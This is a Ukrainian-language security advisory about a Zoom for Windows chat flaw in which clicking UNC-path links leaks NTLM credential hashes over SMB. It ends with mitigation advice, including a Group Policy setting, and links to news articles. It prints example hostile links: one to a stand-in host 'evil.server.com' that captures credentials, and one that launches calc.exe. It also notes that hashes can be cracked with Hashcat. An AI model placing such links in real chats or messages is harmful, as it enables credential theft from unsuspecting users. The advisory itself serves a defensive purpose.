Під час пандемії все більше людей починають працювати віддалено та проводити конференції чи засідання онлайн.
Zoom – одна з найпопулярніших програм для відеоконференцій. Версія даного програмного забезпечення для Windows має вразливість у чаті, в якому учасники зустрічей можуть спілкуватися між собою, надсилаючи текстові повідомлення.
Натискання на посилання із UNC шляхом може дозволити зловмисникам красти дані облікового запису Windows.
UNC – це літеральний рядок, який вказує розташування файлу в файловій системі, адреса каталогу.
Наприклад, звичайна URL-адреса, але із UNC шляхом (\\ evil.server.com \ images \ cat.jpg) перетворюються у гіперпосилання на яке можна натиснути аби відкрити веб-сторінку у своєму браузері, але в такому разі Windows спробує під'єднатися до віддаленого сайту за допомогою протоколу обміну файлами SMB, щоб відкрити віддалений файл cat.jpg.
Здійснюючи це, Windows за замовчуваннямнадсилає ім’я користувача та хеш паролю NTLM, який можна відновити за допомогою безкоштовних інструментів, таких як Hashcat.
Наприклад посилання (\\ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exe) запропонує користувачеві запустити калькулятор.
Що робити?
Не відкривайте посилання, які починаються з “\\”. Будьте пильними, поки ZOOM готує оновлення безпеки.
Заборонити вихідний NTLM трафік до віддалених серверів, налаштувавши відповідну групову політику: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers. У випадаючому меню вибрати “Deny all”.
Але це може створити проблеми з доступом до спільних ресурсів по протоколу SMB, як додати виключення описано тут.
Більше інформації за посиланнями:
- Cтаття: Zoom Lets Attackers Steal Windows Credentials, Run Programs via UNC Links
- Стаття: Windows flaw lets Zoom leak network credentials, runs code remotely
- Стаття: Be careful! A Windows flaw lets Zoom leak network credentials and run code remotely
- Стаття: Zero day vulnerability in Zoom allows Remote code execution in Windows & malware attacks